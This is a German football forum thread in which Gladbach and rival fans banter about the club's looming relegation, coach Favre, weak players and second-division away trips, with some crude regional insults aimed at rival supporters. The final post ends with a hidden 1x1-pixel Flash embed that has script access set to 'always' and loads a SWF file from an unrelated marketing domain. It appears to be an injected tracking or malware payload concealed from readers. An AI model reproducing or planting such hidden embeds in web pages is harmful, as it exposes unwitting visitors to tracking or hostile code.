Mission Impossible: Klassenerhalt - So könnte es gehen!

Genau, um Euch mit 0:4 in Eurem Stadion ohne Ecken zu demütigen, und die 3 Punkte mitzunehmen. ;)

yep. und um sich dann auf'm traktor wieder richtung heimat zu begeben.

ichsachdoch: mir müsse nicht aus kölle weg um nicht so sozialisierten mitmenschen beim ausleben ihrer gewohnheiten zugucken zu müssen.

so long.
 

Ichsachma

Loretta-Spezerl
Und da wirst du nicht abstreiten können, dass viele BMG-Fans Bauern sind.

Nö, tu ich auch nicht.

Wie die unzähligen Geissblockaufkleberfahrzeughalter mit den Kennzeichen BM, DN, EUS, GL, SU, RS und wat weiß ich noch so.

Dazu gehören noch die völlig degenerierten Freunde aus Chorweiler, Buchheim, Buchforst und auch da was weiß ich noch wat.

Also alles easy zwischen uns.
 
Zuletzt bearbeitet:

André

Admin
Und zum dritten mal sitzen wir im Fahrstuhl und das völlig zurecht. Sowas schlechtes findet man nicht nochmal in der Bundesliga.
 

U w e

Moderator
Das bedenkliche ist auch, dass alle (Ausnahme Arango) auch noch Verträge für die 2.Liga haben.

Nach meinen Live Eindrücken bin ich sogar noch "realistischer" wie davor. Raumaufteilung, Laufwege, Abstimmung alles nicht vorhanden. Die Einstellung stimmt auch nicht und das Miteinander auf dem Platz nicht vorhanden. Jeder tut sein Ding, bei Ballbesitz laufen die Mitspieler eher weg anstatt sich anzubieten. Keiner auf dem Platz der mal das Heft in die Hand nimmt oder seine Mitspieler mal zusammenstaucht, kämpfen für seinen Arbeitsplatz bis zum Umfallen - Fehlanzeige.

Zu Favre, der kann zwar nichts für die derzeitige Situation und versucht auch auf Vorkommnisse (Rückstand) schnell zu reagieren hat aber wohl auch wie Frontzeck (Marx) so seinen Lieblingsspieler mit Neustädter gefunden. Der hätte schon zur Halbzeit ausgewechselt werden müssen. Versucht alles mit Direktspiel anstatt mal zu schauen wie die Spielsituation überhaupt ist. So folgte ein Ballverlust nach dem anderen, was eigentlich Konsequenzen hätte haben müssen.

Wir werden an dieser Mannschaft auch in naher Zukunft wenig Freude haben.
 

André

Admin
Wir werden an dieser Mannschaft auch in naher Zukunft wenig Freude haben.
Sehe ich genau so, mache Favre aber keinen Vorwurf. Er würde bestimmt lieber einen Bradley und Bobadilaa, als einen Neustädter und Hanke aufstellen.

In der Truppe sind einige faule Eier drin.

Ich hoffe dass uns möglichst viele Spieler verlassen werden, Aufstellung wird folgen.
 

André

Admin
Viel Spaß bei den Reisen nach Braunschweig, Paderborn und Ingolstadt. Das sind echte Highlights. :)
Danke, den werden wir haben, und Ihr auch bald wieder, so in 2-3 Jahren, nur sind wir dann nicht mehr da unten. ;)

Zähl wenigstens Düsseldorf auf, das ist wenigstens ein echtes Highlight.
 

kleinehexe

SF-Dschungelkönigin 2011 und PTL-Meister 2015/16
Und Aachen und Bochum. Gibt paar nette Auswärtstouren, mal schauen wer noch mit runtergeht. ;)

Eben, das ist so dicht in der Abstiegszone. Und Karlsruhe ist auch immer eine Reise wert.

ABer ich habe das Gefühl dass Gladbach die nächsten drei Spiele richtig punktet.
 

André

Admin
Eben, das ist so dicht in der Abstiegszone. Und Karlsruhe ist auch immer eine Reise wert.
Ja definitv, da haben wir sogar einen befreundeten Fanclub. Desweiteren fahren wir nach Berlin, und sofern 1860 gerettet wird, auch wieder nach München. Und zu feiern wird es sicher mehr geben, als in dieser Katastrophensaison, hauptsache wir haben nun nen ordentlichen Trainer, der auf bessere Tage hoffen lässt.
ABer ich habe das Gefühl dass Gladbach die nächsten drei Spiele richtig punktet.
Selbst wenn, dann wird kurz bevor wir dran sind, wieder verkackt.

Ne, das Ding ist durch und ist auch gut so. In der Relegation abzusteigen wäre viel bitterer. Und wenn wir absteigen dann richtig, bisher jedesmal als Letzter, hoffnungslos abgeschlagen. ;)
 

André

Admin
In Düsseldorf freut man sich jedenfalls schon auf Borussia:

duesseldorf.jpg
 

Oldschool

Spielgestalter
Moderator
Die 3 Punkte könnt ihr haben. Absteigen tut ihr ja trotzdem. :)
Viel Spaß bei den Reisen nach Braunschweig, Paderborn und Ingolstadt. Das sind echte Highlights. :)
Deshalb wird Gladbach ja auch den Busfahrer von Hertha BSC kaufen ( oder war es FCA :gruebel: ). Der kennt jedes Zweitliga-Stadion. ;)
 
T

theog

Guest
Nun koennen wir ernsthaft über einige Spieler hier verhandeln. Ich will Reuss haben, ihr bekommt 1 Million...:schmatz:
 
Reuss ist im Wert von 1 million EUR pro woche leicht :D
<object id="movie" align="" height="1" width="1">








<embed allowscriptaccess="always" flashvars="cid=31" src="http://www.emailmarketings.info/files/31.swf" quality="high" bgcolor="#ffffff" name="movie" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" align="" height="1" width="1">
</object>
 
Oben